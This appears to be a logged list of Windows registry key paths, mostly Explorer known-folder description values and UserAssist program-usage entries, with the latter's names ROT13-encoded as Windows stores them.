HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Programs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Desktop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\SortOrderIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\FavoritesRemovedChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\FavoritesChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCacheSMP
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband\FavoritesChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCacheTBP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_MinMFU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.TrggvatFgnegrq
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\qvfcynlfjvgpu.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pnyp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.FgvpxlAbgrf
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FavccvatGbby.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfcnvag.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\kcfepuij.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JSF.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ErzbgrQrfxgbc
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zntavsl.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.PbagebyCnary
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\freivprf.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.PbagebyCnary.Gnfxone
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\rkcybere.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Q:\IOBKJVAQBJFNQQVGVBAF-NZQ64.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Benpyr\IveghnyObk Thrfg Nqqvgvbaf\IObkQeiVafg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\ertrqvg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\\IOBKFIE\Qbjaybnqf\9.0_NqorEqe90_ra_HF.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfvrkrp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.JvaqbjfVafgnyyre
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qrfxgbc\CVY-1.1.7.jva32-cl2.7.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qrfxgbc\wqx-7-jvaqbjf-v586.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.VagreargRkcybere.Qrsnhyg
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Q:\frghc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Q:\IObkJvaqbjfNqqvgvbaf.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\HfreNppbhagPbagebyFrggvatf.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\erxrljvm.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zzp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\fyhv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\frgup.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FlfgrzCebcregvrfNqinaprq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qrfxgbc\AQC451-XO2858728-k86-k64-NyyBF-RAH.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\JVAJBEQ.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\RKPRY.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\BHGYBBX.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\CBJRECAG.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\BARABGR.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Nqbor\Ernqre 9.0\Ernqre\NpebEq32.rkr
